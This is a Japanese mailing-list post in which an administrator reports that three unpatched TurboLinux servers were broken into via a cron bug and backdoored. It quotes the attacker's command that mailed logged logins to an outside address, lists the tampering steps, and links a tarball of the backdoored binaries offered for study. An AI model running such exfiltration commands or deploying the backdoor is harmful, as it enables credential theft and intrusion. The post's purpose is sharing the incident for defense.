[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[connect24h:02065] はじめまして。やられました(;_;



kirei  『ねぇ、見た?このサイト』
 suteki 『これでしょう!いいよね♪』
         http://www.kadan.ne.jp/bn.cgi?info02 
 kantan 『お、いいね。早速使おうっと!』
------------------------------------------------------------------------


はじめまして、有坂と申します。


同時期に入れたupdateをたいしてしてない、3台のTurboLinux 3.0,TurboLinux
Server 1.0が同じ手口でやられたんで、このMLに入会させていただきました。

何らかの形で
mv /etc/hosts.deny /etc/host.deny
を実行され一般ユーザで入り、cronのバグをつきrootを取得して
バックドアを仕掛けられたようです。
/dev/sgk/.fsdc/system にログインを記録し、
/dev/pttys で
cat /dev/sgk/.fsdc/system | mail prosupp@xxxxxxx >/dev/null 2>&1
とメールを送っていたようですが、prosupp@xxxxxxxがmessages fullだったみた
いです。現在はアカウントは消えているみたいです。
/usr/sbin/nscd がsshを改変したっぽいバックドアでした。

http://oak.zero.ad.jp/arisa/gomi/hacked.tgz
に改変されたっぽいのをpassword等は編集して削除して2〜3日あげておきます。
参考にしてください。悪用はしないようにお願いします。
(1.2Mほどあるので注意してください。


すみませんが、これからもよろしくお願いします。

-- 
Noriyuki Arisaka
e-mail:   arisa@xxxxxxxxxxxxxxxxx
          arisa@xxxxxxxxxxxx
http://oak.zero.ad.jp/arisa/